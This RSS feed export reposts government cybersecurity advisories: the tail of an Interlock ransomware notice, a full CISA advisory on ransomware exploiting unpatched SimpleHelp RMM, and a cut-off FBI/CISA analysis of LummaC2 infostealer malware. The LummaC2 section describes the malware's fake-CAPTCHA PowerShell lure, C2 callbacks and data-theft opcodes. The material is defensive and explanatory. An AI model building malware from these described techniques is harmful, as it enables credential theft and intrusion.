<p><a class="ck-anchor" id="note12"><sup>12</sup></a> Biasiotto, “<a href="https://blog.talosintelligence.com/emerging-interlock-ransomware/" target="_blank">Unwrapping the Emerging Interlock Ransomware Attack</a>.”</p>
<p><a class="ck-anchor" id="note13"><sup>13</sup></a> Biasiotto, “<a href="https://blog.talosintelligence.com/emerging-interlock-ransomware/" target="_blank">Unwrapping the Emerging Interlock Ransomware Attack</a>.”</p>
<p><a class="ck-anchor" id="note14"><sup>14</sup></a> Lawrence Abrams, “Meet Interlock — The New Ransomware Targeting FreeBSD Servers,” <em>Bleeping Computer</em>, November 3, 2024, <a href="https://www.bleepingcomputer.com/news/security/meet-interlock-the-new-ransomware-targeting-freebsd-servers/" target="_blank" title="https://www.bleepingcomputer.com/news/security/meet-interlock-the-new-ransomware-targeting-freebsd-servers/">https://www.bleepingcomputer.com/news/security/meet-interlock-the-new-ransomware-targeting-freebsd-servers/</a>.</p>
<p><a class="ck-anchor" id="note15"><sup>15</sup></a> Biasiotto, “<a href="https://blog.talosintelligence.com/emerging-interlock-ransomware/" target="_blank">Unwrapping the Emerging Interlock Ransomware Attack</a>.”</p>
<p><a class="ck-anchor" id="note16"><sup>16</sup></a> Graham Cluley, “Interlock Ransomware: What You Need to Know,” <em>Fortra&nbsp;</em>(blog), <em>Fortra</em>, last modified May 30, 2025, <a href="https://www.tripwire.com/state-of-security/interlock-ransomware-what-you-need-know" title="https://www.tripwire.com/state-of-security/interlock-ransomware-what-you-need-know">https://www.tripwire.com/state-of-security/interlock-ransomware-what-you-need-know</a>.</p>
<p><a class="ck-anchor" id="note17"><sup>17</sup></a> Sekoia Threat Detection and Research team, “<a href="https://blog.sekoia.io/interlock-ransomware-evolving-under-the-radar/" target="_blank" title="Interlock Ransomware Evolving Under the Radar">Interlock Ransomware Evolving Under the Radar</a>.”</p>
<p>Source: US-CERT Alerts</p>
]]></content:encoded>
			<wfw:commentRss>http://disensogroup.com/stopransomware-interlock/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Ransomware Actors Exploit Unpatched SimpleHelp Remote Monitoring and Management to Compromise Utility Billing Software Provider</title>
		<link>http://disensogroup.com/ransomware-actors-exploit-unpatched-simplehelp-remote-monitoring-and-management-to-compromise-utility-billing-software-provider/</link>
		<comments>http://disensogroup.com/ransomware-actors-exploit-unpatched-simplehelp-remote-monitoring-and-management-to-compromise-utility-billing-software-provider/#comments</comments>
		<pubDate>Thu, 12 Jun 2025 14:29:54 +0000</pubDate>
		<dc:creator><![CDATA[pdisenso]]></dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[aside format]]></category>

		<guid isPermaLink="false">http://disensogroup.com/ransomware-actors-exploit-unpatched-simplehelp-remote-monitoring-and-management-to-compromise-utility-billing-software-provider/</guid>
		<description><![CDATA[Summary The Cybersecurity and Infrastructure Security Agency (CISA) is releasing this advisory in response to ransomware actors leveraging unpatched instances of a vulnerability in SimpleHelp Remote Monitoring and Management (RMM) to compromise customers of a utility billing software provider. This incident reflects a broader pattern of ransomware actors targeting organizations through unpatched versions of SimpleHelp...]]></description>
				<content:encoded><![CDATA[<h2><strong>Summary</strong></h2>
<p>The Cybersecurity and Infrastructure Security Agency (CISA) is releasing this advisory in response to ransomware actors leveraging unpatched instances of a vulnerability in SimpleHelp Remote Monitoring and Management (RMM) to compromise customers of a utility billing software provider. This incident reflects a broader pattern of ransomware actors targeting organizations through unpatched versions of SimpleHelp RMM since January 2025.</p>
<p>SimpleHelp versions 5.5.7 and earlier contain several vulnerabilities, including <a href="https://www.cve.org/CVERecord?id=CVE-2024-57727" target="_blank" title="CVE-2024-57727">CVE-2024-57727</a>—a path traversal vulnerability.<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-163a#note1" title="Note1"><sup>1</sup></a><sup> </sup>Ransomware actors likely leveraged CVE-2024-57727 to access downstream customers’ unpatched SimpleHelp RMM for disruption of services in double extortion compromises.<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-163a#note1" title="Note 1"><sup>1</sup></a><sup>&nbsp;</sup></p>
<p>CISA added CVE-2024-57727 to its <a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog" title="Known Exploited Vulnerabilities Catalog">Known Exploited Vulnerabilities (KEV) Catalog</a> on Feb. 13, 2025.</p>
<p>CISA urges software vendors, downstream customers, and end users to immediately implement the <strong>Mitigations </strong>listed in this advisory based on confirmed compromise or risk of compromise.</p>
<p>Download the PDF version of this report:</p>
<div class="c-file">
<div class="c-file__download">
    <a href="https://www.cisa.gov/sites/default/files/2025-06/aa25-163a-ransomware-simplehelp-rmm-compromise.pdf" class="c-file__link" target="_blank">AA25-163A Ransomware Actors Exploit Unpatched SimpleHelp Remote Monitoring and Management to Compromise Utility Billing Software Provider</a><br />
    <span class="c-file__size">(PDF,       420.49 KB<br />
  )</span>
  </div>
</div>
<h2><strong>Mitigations</strong></h2>
<p>CISA recommends organizations implement the mitigations below to respond to emerging ransomware activity exploiting SimpleHelp software. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s <a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals" title="CPGs webpage">CPGs webpage</a> for more information on the CPGs, including additional recommended baseline protections. These mitigations apply to all critical infrastructure organizations.</p>
<h3>Vulnerable Third-Party Vendors</h3>
<p>If SimpleHelp is embedded or bundled in vendor-owned software or if a third-party service provider leverages SimpleHelp on a downstream customer’s network, then identify the SimpleHelp server version at the top of the file <code>&lt;file_path&gt;/SimpleHelp/configuration/serverconfig.xml</code>. If version 5.5.7 or prior is found or has been used since January 2025, third-party vendors should:</p>
<ol>
<li>Isolate the SimpleHelp server instance from the internet or stop the server process.</li>
<li>Upgrade immediately to the latest SimpleHelp version in accordance with SimpleHelp’s security vulnerability advisory.<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-163a#note2" title="Note 2"><sup>2</sup></a></li>
<li>Contact your downstream customers to direct them to take actions to secure their endpoints and undertake threat hunting actions on their network.</li>
</ol>
<h3>Vulnerable Downstream Customers and End Users</h3>
<p>Determine if the system is running an unpatched version of SimpleHelp RMM either directly or embedded in third-party software.</p>
<h4><strong>SimpleHelp Endpoints</strong></h4>
<p>Determine if an endpoint is running the remote access (RAS) service by checking the following paths depending on the specific environment:</p>
<ul>
<li>Windows: <code>%APPDATA%JWrapper-Remote Access</code></li>
<li>Linux: <code>/opt/JWrapper-Remote Access</code></li>
<li>MacOs: <code>/Library/Application Support/JWrapper-Remote Access</code></li>
</ul>
<p>If RAS installation is present and running, open the <code>serviceconfig.xml</code> file in <code>&lt;file_path&gt;/JWrapper-Remote Access/JWAppsSharedConfig/</code> to determine if the registered service is vulnerable. The lines starting with <code>&lt;ConnectTo</code> indicate the server addresses where the service is registered.</p>
<h4><strong>SimpleHelp Server</strong></h4>
<p>Determine the version of any SimpleHelp server by performing an HTTP query against it. Add <code>/allversions</code> (e.g.,&nbsp;<code>https://simple-help.com/allversions</code>)&nbsp;to query the URL for the version page. This page will list the running version.</p>
<p>If an unpatched SimpleHelp version 5.5.7 or earlier is confirmed on a system, organizations should conduct threat hunting actions for evidence of compromise and continuously monitor for unusual inbound and outbound traffic from the SimpleHelp server. <strong>Note:&nbsp;</strong>This is not an exhaustive list of indicators of compromise.</p>
<ol>
<li>&nbsp;Refer to SimpleHelp’s guidance to determine compromise and next steps.<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-163a#note3" title="Note 3"><sup>3</sup></a></li>
<li>Isolate the SimpleHelp server instance from the internet or stop the server process.</li>
<li>Search for any suspicious or anomalous executables with three alphabetic letter filenames (e.g., <code>aaa.exe</code>, <code>bbb.exe</code>, etc.) with a creation time after January 2025. Additionally, perform host and network vulnerability security scans via reputable scanning services to verify malware is not on the system.</li>
<li>Even if there is no evidence of compromise, users should immediately upgrade to the latest SimpleHelp version in accordance with SimpleHelp’s security vulnerabilities advisory.<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-163a#note4" title="Note 4"><sup>4</sup></a></li>
</ol>
<p>If your organization is unable to immediately identify and patch vulnerable versions of SimpleHelp, apply appropriate workarounds. In this circumstance, CISA recommends using other vendor-provided mitigations when available. These non-patching workarounds should not be considered permanent fixes and organizations should apply the appropriate patch as soon as it is made available.</p>
<h3>Encrypted Downstream Customers and End Users</h3>
<p>If a system has been encrypted by ransomware:</p>
<ol>
<li>Disconnect the affected system from the internet.</li>
<li>Use clean installation media (e.g., a bootable USD drive or DVD) to reinstall the operating system. Ensure the installation media is free from malware.</li>
<li>Wipe the system and only restore data from a clean backup. Ensure data files are obtained from a protected environment to avoid reintroducing ransomware to the system.</li>
</ol>
<p>CISA urges you to promptly report ransomware incidents to a <a href="https://www.fbi.gov/contact-us/field-offices" target="_blank" title="local FBI Field Office">local FBI Field Office</a>, FBI’s <a href="https://www.ic3.gov/" target="_blank" title="Internet Crime Compliant Center (IC3)">Internet Crime Compliant Center (IC3)</a>, and CISA via CISA’s 24/7 Operations Center (<a href="mailto:report@cisa.gov" title="report@cisa.gov">report@cisa.gov</a> or 888-282-0870).</p>
<h3><strong>Proactive Mitigations to Reduce Risk</strong></h3>
<p>To reduce opportunities for intrusion and to strengthen response to ransomware activity, CISA recommends customers of vendors and managed service providers (MSPs) implement the following best practices:</p>
<ul>
<li>Maintain a robust asset inventory and hardware list [<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#AssetInventory1A" title="CPG 1.A">CPG 1.A</a>].</li>
<li>Maintain a clean, offline backup of the system to ensure encryption will not occur once reverted. Conduct a daily system backup on a separate, offline device, such as a flash drive or external hard drive. Remove the device from the computer after backup is complete [<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#SystemBackups2R" title="CPG 2.R">CPG 2.R</a>].</li>
<li>Do not expose remote services such as Remote Desktop Protocol (RDP) on the web. If these services must be exposed, apply appropriate compensating controls to prevent common forms of abuse and exploitation. Disable unnecessary OS applications and network protocols on internet-facing assets [<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#NoExploitableServicesontheInternet2W" title="CPG 2.W">CPG 2.W</a>].</li>
<li>Conduct a risk analysis for RMM software on the network. If RMM is required, ask third-party vendors what security controls are in place.</li>
<li>Establish and maintain open communication channels with third-party vendors to stay informed about their patch management process.</li>
<li>For software vendors, consider integrating a Software Bill of Materials (SBOM) into products to reduce the amount of time for vulnerability remediation.
<ul>
<li>An SBOM is a formal record of components used to build software. SBOMs enhance supply chain risk management by quickly identifying and avoiding known vulnerabilities, identifying security requirements, and managing mitigations for vulnerabilities. For more information, see CISA’s <a href="https://www.cisa.gov/sbom" title="SBOM">SBOM</a> page.</li>
</ul>
</li>
</ul>
<h2><strong>Resources</strong></h2>
<ul>
<li><strong>Health-ISAC:</strong><a href="https://health-isac.org/threat-bulletin-simplehelp-rmm-software-leveraged-in-exploitation-attempt-to-breach-networks/" target="_blank" title="Threat Bulletin: SimpleHelp RMM Software Leveraged in Exploitation Attempt to Breach Networks">Threat Bulletin: SimpleHelp RMM Software Leveraged in Exploitation Attempt to Breach Networks</a></li>
<li><strong>Arctic Wolf:&nbsp;</strong><a href="https://arcticwolf.com/resources/blog-uk/arctic-wolf-observes-campaign-exploiting-simplehelp-rmm-software-initial-access/" target="_blank" title="Arctic Wolf Observes Campaign Exploiting SimpleHelp RMM Software for Initial Access">Arctic Wolf Observes Campaign Exploiting SimpleHelp RMM Software for Initial Access</a></li>
<li><strong>CISA:&nbsp;</strong><a href="https://www.cisa.gov/stopransomware/ransomware-guide" title="#StopRansomware Guide">#StopR</a><a href="#StopRansomware" title="#StopRansomware Guide">ansomware Guide</a></li>
</ul>
<h2><strong>Reporting</strong></h2>
<p>Your organization has no obligation to respond or provide information back to FBI in response to this advisory. If, after reviewing the information provided, your organization decides to provide information to FBI, reporting must be consistent with applicable state and federal laws.</p>
<p>FBI is interested in any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with threat actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.</p>
<p>Additional details of interest include a targeted company point of contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, and host- and network-based indicators.</p>
<p>CISA and FBI do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, FBI and CISA urge you to promptly report ransomware incidents to FBI’s <a href="https://www.ic3.gov/Home/ComplaintChoice" title="Internet Crime Complain Center (IC3)">Internet Crime Complain Center (IC3)</a>, a <a href="https://www.fbi.gov/contact-us/field-offices" title="local FBI Field Office">local FBI Field Office</a>, or CISA via the agency’s <a href="https://myservices.cisa.gov/irf" title="Incident Reporting System">Incident Reporting System</a> or its 24/7 Operations Center (<a href="mailto:report@cisa.gov)or" title="report@cisa.gov">report@cisa.gov</a>) or by calling 1-844-Say-CISA (1-844-729-2472).</p>
<p>SimpleHelp users or vendors can contact&nbsp;<a href="mailto:support@simple-help.com" title="support@simple-help.com">support@simple-help.com</a> for assistance with queries or concerns.</p>
<h2><strong>Disclaimer</strong></h2>
<p>The information in this report is being provided “as is” for informational purposes only. CISA does not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favor by CISA.</p>
<h2><strong>Version History</strong></h2>
<p><strong>June 12, 2025:</strong> Initial version.</p>
<h2><strong>Notes</strong></h2>
<p><a class="ck-anchor" id="note1"><strong>1.</strong></a><strong> </strong>Anthony Bradshaw, et. al., “DragonForce Actors Target SimpleHelp Vulnerabilities to Attack MSP, Customers,” <em>Sophos News</em>, May 27, 2025, <a href="https://news.sophos.com/en-us/2025/05/27/dragonforce-actors-target-simplehelp-vulnerabilities-to-attack-msp-customers/" target="_blank" title="DragonForce actors target SimpleHelp vulnerabilities to attack MSP, customers">https://news.sophos.com/en-us/2025/05/27/dragonforce-actors-target-simplehelp-vulnerabilities-to-attack-msp-customers/</a>.<br /><a class="ck-anchor" id="note2"><strong>2</strong></a><strong>.</strong> For instructions for upgrading to the latest version of SimpleHelp, see <a href="https://simple-help.com/kb---security-vulnerabilities-01-2025" target="_blank" title="SimpleHelp’s security vulnerability advisory.">SimpleHelp’s security vulnerability</a> advisory.<br /><a class="ck-anchor" id="note3"><strong>3.</strong></a> To determine possibility of compromise and next steps, see <a href="https://simple-help.com/kb---security-vulnerabilities-01-2025#characteristics-of-compromise" target="_blank" title="Characteristics of Compromise">SimpleHelp’s guidance</a>.<br /><a class="ck-anchor" id="note4"><strong>4</strong></a><strong>. </strong>For instructions for upgrading to the latest version of SimpleHelp, see <a href="https://simple-help.com/kb---security-vulnerabilities-01-2025" target="_blank" title="security vulnerability advisory">SimpleHelp’s security vulnerability</a> advisory.</p>
<p>Source: US-CERT Alerts</p>
]]></content:encoded>
			<wfw:commentRss>http://disensogroup.com/ransomware-actors-exploit-unpatched-simplehelp-remote-monitoring-and-management-to-compromise-utility-billing-software-provider/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Threat Actors Deploy LummaC2 Malware to Exfiltrate Sensitive Data from Organizations</title>
		<link>http://disensogroup.com/threat-actors-deploy-lummac2-malware-to-exfiltrate-sensitive-data-from-organizations/</link>
		<comments>http://disensogroup.com/threat-actors-deploy-lummac2-malware-to-exfiltrate-sensitive-data-from-organizations/#comments</comments>
		<pubDate>Tue, 20 May 2025 19:20:23 +0000</pubDate>
		<dc:creator><![CDATA[pdisenso]]></dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[aside format]]></category>

		<guid isPermaLink="false">http://disensogroup.com/threat-actors-deploy-lummac2-malware-to-exfiltrate-sensitive-data-from-organizations/</guid>
		<description><![CDATA[Summary The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint advisory to disseminate known tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) associated with threat actors deploying the LummaC2 information stealer (infostealer) malware. LummaC2 malware is able to infiltrate victim computer networks and exfiltrate...]]></description>
				<content:encoded><![CDATA[<h2><strong>Summary</strong></h2>
<p>The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint advisory to disseminate known tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) associated with threat actors deploying the LummaC2 information stealer (infostealer) malware. LummaC2 malware is able to infiltrate victim computer networks and exfiltrate sensitive information, threatening vulnerable individuals’ and organizations’ computer networks across multiple U.S. critical infrastructure sectors. According to FBI information and trusted third-party reporting, this activity has been observed as recently as May 2025. The IOCs included in this advisory were associated with LummaC2 malware infections from November 2023 through May 2025.</p>
<p>The FBI and CISA encourage organizations to implement the recommendations in the <strong>Mitigations</strong> section of this advisory to reduce the likelihood and impact of LummaC2 malware.</p>
<p>Download the PDF version of this report:</p>
<div class="c-file">
<div class="c-file__download">
    <a href="https://www.cisa.gov/sites/default/files/2025-05/aa25-141b-threat-actors-deploy-lummac2-malware-to-exfiltrate-sensitive-data-from-organizations.pdf" class="c-file__link" target="_blank">AA25-141B Threat Actors Deploy LummaC2 Malware to Exfiltrate Sensitive Data from Organizations</a><br />
    <span class="c-file__size">(PDF,       1.28 MB<br />
  )</span>
  </div>
</div>
<p>For a downloadable copy of IOCs, see:</p>
<div class="c-file">
<div class="c-file__download">
    <a href="https://www.cisa.gov/sites/default/files/2025-05/AA25-141B.stix_.xml" class="c-file__link" target="_blank">AA25-141B STIX XML</a><br />
    <span class="c-file__size">(XML,       146.54 KB<br />
  )</span>
  </div>
</div>
<div class="c-file">
<div class="c-file__download">
    <a href="https://www.cisa.gov/sites/default/files/2025-05/AA25-141B-Threat-Actors-Deploy-LummaC2-Malware-to-Exfiltrate-Sensitive-Data-from-Organizations.stix_.json" class="c-file__link" target="_blank">AA25-141B STIX JSON</a><br />
    <span class="c-file__size">(JSON,       300.90 KB<br />
  )</span>
  </div>
</div>
<h2><strong>Technical Details</strong></h2>
<p><strong>Note:</strong> This advisory uses the <a href="https://attack.mitre.org/versions/v17/matrices/enterprise/" target="_blank" title="MITRE ATT&amp;CK® Matrix for Enterprise">MITRE ATT&amp;CK<sup>®</sup> Matrix for Enterprise</a> framework, version 17. See the <strong>MITRE ATT&amp;CK Tactics and Techniques</strong> section of this advisory for threat actor activity mapped to MITRE ATT&amp;CK tactics and techniques.</p>
<h3>Overview</h3>
<p>LummaC2 malware first appeared for sale on multiple Russian-language speaking cybercriminal forums in 2022. Threat actors frequently use spearphishing hyperlinks and attachments to deploy LummaC2 malware payloads [<a href="https://attack.mitre.org/versions/v17/techniques/T1566/001/" target="_blank" title="T1566.001">T1566.001</a>, <a href="https://attack.mitre.org/versions/v17/techniques/T1566/002/" title="T1566.002">T1566.002</a>]. Additionally, threat actors rely on unsuspecting users to execute the payload by clicking a fake Completely Automated Public Turing Test to tell Computers and Humans Apart (CAPTCHA). The CAPTCHA contains instructions for users to then open the Windows Run window (Windows Button + R) and paste clipboard contents (“CTRL + V”). After users press “enter” a subsequent Base64-encoded PowerShell process is executed.</p>
<p>To obfuscate their operations, threat actors have embedded and distributed LummaC2 malware within spoofed or fake popular software (i.e., multimedia player or utility software) [<a href="https://attack.mitre.org/versions/v17/techniques/T1036/" target="_blank" title="T1036">T1036</a>]. The malware’s obfuscation methods allow LummaC2 actors to bypass standard cybersecurity measures, such as Endpoint Detection and Response (EDR) solutions or antivirus programs, designed to flag common phishing attempts or drive-by downloads [<a href="https://attack.mitre.org/versions/v17/techniques/T1027/" target="_blank" title="T1027">T1027</a>].</p>
<p>Once a victim’s computer system is infected, the malware can exfiltrate sensitive user information, including personally identifiable information, financial credentials, cryptocurrency wallets, browser extensions, and multifactor authentication (MFA) details without immediate detection [<a href="https://attack.mitre.org/versions/v17/tactics/TA0010/" target="_blank" title="TA0010">TA0010</a>, <a href="https://attack.mitre.org/versions/v17/techniques/T1119/" target="_blank" title="T1119">T1119</a>]. Private sector statistics indicate there were more than 21,000 market listings selling LummaC2 logs on multiple cybercriminal forums from April through June of 2024, a 71.7 percent increase from April through June of 2023.</p>
<h3>File Execution</h3>
<p>Upon execution, the <code>LummaC2.exe</code> file will enter its main routine, which includes four sub-routines (see <strong>Figure 1</strong>).</p>
<figure class="c-figure c-figure--image" role="group">
<div class="c-figure__media">    <img src="https://www.cisa.gov/sites/default/files/styles/large/public/2025-05/Figure%201%20-%20LummaC2%20Main%20Routine.png?itok=4-3q4JJo" width="653" height="185" alt="Figure 1. LummaC2 Main Routine"></p>
</div>
<figcaption class="c-figure__caption"><em>Figure 1. LummaC2 Main Routine</em></figcaption>
</figure>
<p>The first routine decrypts strings for a message box that is displayed to the user (see <strong>Figure 2</strong>).</p>
<figure class="c-figure c-figure--image" role="group">
<div class="c-figure__media">    <img src="https://www.cisa.gov/sites/default/files/styles/large/public/2025-05/Figure%202%20-%20Message%20Box.png?itok=ORRAaghu" width="660" height="157" alt="Figure 2. Message Box"></p>
</div>
<figcaption class="c-figure__caption"><em>Figure 2. Message Box</em></figcaption>
</figure>
<p>If the user selects <code>No</code>, the malware will exit. If the user selects <code>Yes</code>, the malware will move on to its next routine, which decrypts its callback Command and Control (C2) domains [<a href="https://attack.mitre.org/versions/v17/techniques/T1140/" target="_blank" title="T1140">T1140</a>]. A list of observed domains is included in the <strong>Indicators of Compromise</strong> section.</p>
<p>After each domain is decoded, the implant will attempt a <code>POST</code> request [<a href="https://attack.mitre.org/versions/v17/techniques/T1071/001/" target="_blank" title="T1071.001">T1071.001</a>] (see <strong>Figure 3</strong>).</p>
<figure class="c-figure c-figure--image" role="group">
<div class="c-figure__media">    <img src="https://www.cisa.gov/sites/default/files/styles/large/public/2025-05/Figure%203%20-%20Post%20Request.png?itok=nPWt04-t" width="648" height="143" alt="Figure 3. Post Request"></p>
</div>
<figcaption class="c-figure__caption"><em>Figure 3. </em><code><em>Post</em></code><em> Request</em></figcaption>
</figure>
<p>If the <code>POST</code> request is successful, a pointer to the decoded domain string is saved in a global variable for later use in the main C2 routine used to retrieve JSON formatted commands (see <strong>Figure 4</strong>).</p>
<figure class="c-figure c-figure--image" role="group">
<div class="c-figure__media">    <img src="https://www.cisa.gov/sites/default/files/styles/large/public/2025-05/Figure%204%20-%20Code%20Saving%20Successful%20Callback%20Request.png?itok=txJPFJab" width="660" height="152" alt="Figure 4. Code Saving Successful Callback Request"></p>
</div>
<figcaption class="c-figure__caption"><em>Figure 4. Code Saving Successful Callback Request</em></figcaption>
</figure>
<p>Once a valid C2 domain is contacted and saved, the malware moves on to the next routine, which queries the user’s name and computer name utilizing the Application Programming Interfaces (APIs) <code>GetUserNameW</code> and <code>GetComputerNameW</code> respectively [<a href="https://attack.mitre.org/versions/v17/techniques/T1012/" target="_blank" title="T1012">T1012</a>]. The returned data is then hashed and compared against a hard-coded hash value (see <strong>Figure 5</strong>).</p>
<figure class="c-figure c-figure--image" role="group">
<div class="c-figure__media">    <img src="https://www.cisa.gov/sites/default/files/styles/large/public/2025-05/Figure%205%20-%20User%20and%20Computer%20Name%20Check.png?itok=ZYtbs3GM" width="655" height="175" alt="Figure 5. User and Computer Name Check"></p>
</div>
<figcaption class="c-figure__caption"><em>Figure 5. User and Computer Name Check</em></figcaption>
</figure>
<p>The hashing routine was not identified as a standard algorithm; however, it is a simple routine that converts a Unicode string to a 32-bit hexadecimal value.</p>
<p>If the username hash is equal to the value <code>0x56CF7626</code>, then the computer name is queried. If the computer name queried is seven characters long, then the name is hashed and checked against the hard-coded value of <code>0xB09406C7</code>. If both values match, a final subroutine will be called with a static value of the computer name hash as an argument. If this routine is reached, the process will terminate. This is most likely a failsafe to prevent the malware from running on the attacker’s system, as its algorithms are one-way only and will not reveal information on the details of the attacker’s own hostname and username.</p>
<p>If the username and hostname check function returns <code>zero</code> (does not match the hard-coded values), the malware will enter its main callback routine. The LummaC2 malware will contact the saved hostname from the previous check and send the following <code>POST</code> request (see <strong>Figure 6</strong>).</p>
<figure class="c-figure c-figure--image" role="group">
<div class="c-figure__media">    <img src="https://www.cisa.gov/sites/default/files/styles/large/public/2025-05/Figure%206%20-%20Second%20POST%20Request.png?itok=4cdoQzJY" width="648" height="143" alt="Figure 6. Second POST Request"></p>
</div>
<figcaption class="c-figure__caption"><em>Figure 6. Second </em><code><em>POST</em></code><em> Request</em></figcaption>
</figure>
<p>The data returned from the C2 server is encrypted. Once decoded, the C2 data is in a JSON format and is parsed by the LummaC2 malware. The C2 uses the JSON configuration to parse its browser extensions and target lists using the <code>ex</code> key, which contains an array of objects (see <strong>Figure 7</strong>).</p>
<figure class="c-figure c-figure--image" role="group">
<div class="c-figure__media">    <img src="https://www.cisa.gov/sites/default/files/styles/large/public/2025-05/Figure%207%20-%20Parsing%20of%20ex%20JSON%20Value.png?itok=rotohQzR" width="656" height="52" alt="Figure 7. Parsing of ex JSON Value"></p>
</div>
<figcaption class="c-figure__caption"><em>Figure 7. Parsing of </em><code><em>ex</em></code><em> JSON Value</em></figcaption>
</figure>
<p>Parsing the <code>c</code> key contains an array of objects, which will give the implant its C2 (see <strong>Figure 8</strong>).</p>
<figure class="c-figure c-figure--image" role="group">
<div class="c-figure__media">    <img src="https://www.cisa.gov/sites/default/files/styles/large/public/2025-05/Figure%208%20-%20Parsing%20of%20c%20JSON%20Value.png?itok=CH958VKZ" width="658" height="91" alt="Figure 8. Parsing of c JSON Value"></p>
</div>
<figcaption class="c-figure__caption"><em>Figure 8. Parsing of </em><code><em>c</em></code><em> JSON Value</em></figcaption>
</figure>
<h3>C2 Instructions</h3>
<p>Each array object that contains the JSON key value of <code>t</code> will be evaluated as a command opcode, resulting in the C2 instructions in the subsections below.</p>
<h4><strong>1. Opcode </strong><code><strong>0</strong></code><strong> – Steal Data Generic</strong></h4>
<p>This command allows five fields to be defined when stealing data, offering the most flexibility. The Opcode <code>O</code> command option allows LummaC2 affiliates to add their custom information gathering details (see <strong>Table 1</strong>).</p>
<div>
<table class="tablesaw tablesaw-stack">
<caption><em>Table&nbsp;2. Opcode </em><code><em>1</em></code><em> Options</em></caption>
<thead>
<tr>
<th role="columnheader">Key</th>
<th role="columnheader">Value</th>
</tr>
</thead>
<tbody>
<tr>
<td>p</td>
<td>Path to steal from</td>
</tr>
<tr>
<td>m</td>
<td>File extensions to read</td>
</tr>
<tr>
<td>z</td>
<td>Output directory to store stolen data</td>
</tr>
<tr>
<td>d</td>
<td>Depth of recursiveness</td>
</tr>
<tr>
<td>fs</td>
<td>Maximum file size</td>
</tr>
</tbody>
</table>
<h4><strong>2. Opcode </strong><code><strong>1</strong></code><strong> – Steal Browser Data</strong></h4>
<p>This command only allows for two options: a path and the name of the output directory. This command, based on sample configuration downloads, is used for browser data theft for everything except Mozilla [<a href="https://attack.mitre.org/versions/v17/techniques/T1217/" target="_blank" title="T1217">T1217</a>] (see <strong>Table 2</strong>).</p>
<div>
<table class="tablesaw tablesaw-stack">
<caption><em>Table 2. Opcode </em><code><em>1</em></code><em> Options</em></caption>
<thead>
<tr>
<th role="columnheader">Key</th>
<th role="columnheader">Value</th>
</tr>
</thead>
<tbody>
<tr>
<td>p</td>
<td>Path to steal from</td>
</tr>
<tr>
<td>z</td>
<td>Name of Browser – Output</td>
</tr>
</tbody>
</table>
<h4><strong>3. Opcode </strong><code><strong>2</strong></code><strong> – Steal Browser Data (Mozilla)</strong></h4>
<p>This command is identical to Opcode <code>1</code>; however, this option seems to be utilized solely for Mozilla browser data (see <strong>Table 3</strong>).</p>
<div>
<table class="tablesaw tablesaw-stack">
<caption><em>Table 3. Opcode </em><code><em>2</em></code><em> Options</em></caption>
<thead>
<tr>
<th role="columnheader">Key</th>
<th role="columnheader">Value</th>
</tr>
</thead>
<tbody>
<tr>
<td>p</td>
<td>Path to steal from</td>
</tr>
<tr>
<td>z</td>
<td>Name of Browser – Output</td>
</tr>
</tbody>
</table>
<h4><strong>4. Opcode </strong><code><strong>3</strong></code><strong> – Download a File</strong></h4>
<p>This command contains three options: a URL, file extension, and execution type. The configuration can specify a remote file with <code>u</code> to download and create the extension specified in the <code>ft</code> key [<a href="https://attack.mitre.org/versions/v17/techniques/T1105/" target="_blank" title="T1105">T1105</a>] (see <strong>Table 4</strong>).</p>
<div>
<table class="tablesaw tablesaw-stack">
<caption><em>Table 4. Opcode </em><code><em>3</em></code><em> Options</em></caption>
<thead>
<tr>
<th role="columnheader">Key</th>
<th role="columnheader">Value</th>
</tr>
</thead>
<tbody>
<tr>
<td>u</td>
<td>URL for Download</td>
</tr>
<tr>
<td>ft</td>
<td>File Extension</td>
</tr>
<tr>
<td>e&nbsp;</td>
<td>Execution Type</td>
</tr>
</tbody>
</table>
<p>The <code>e</code> value can take two values: <code>0</code> or <code>1</code>. This specifies how to execute the downloaded file either with the <code>LoadLibrary</code> API or via the command line with <code>rundll32.exe</code> [<a href="https://attack.mitre.org/versions/v17/techniques/T1106/" target="_blank" title="T1106">T1106</a>] (see <strong>Table 5</strong>).</p>
<div>
<table class="tablesaw tablesaw-stack">
<caption><em>Table&nbsp;5. Execution Types</em></caption>
<thead>
<tr>
<th role="columnheader">Key</th>
<th role="columnheader">Value</th>
</tr>
</thead>
<tbody>
<tr>
<td>e=0</td>
<td>Execute with <code>LoadLibraryW()</code></td>
</tr>
<tr>
<td>e=1</td>
